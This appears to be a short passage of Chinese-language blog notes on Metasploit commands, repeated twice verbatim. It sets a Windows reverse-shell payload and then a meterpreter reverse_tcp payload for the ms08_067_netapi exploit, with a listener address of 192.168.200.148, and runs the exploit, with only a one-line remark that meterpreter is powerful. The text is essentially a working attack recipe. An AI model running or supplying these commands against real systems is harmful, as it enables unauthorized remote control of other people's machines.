set payload windows/shell_reverse_tcp //反向连接
set LHOST 192.168.200.148
show options
exploit
meterpreter是一个很强大的工具。
可以payload设置为meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
转载请注明:exchen's blog » MSF命令小记
set payload windows/shell_reverse_tcp //反向连接
set LHOST 192.168.200.148
show options
exploit
meterpreter是一个很强大的工具。
可以payload设置为meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
转载请注明:exchen's blog » MSF命令小记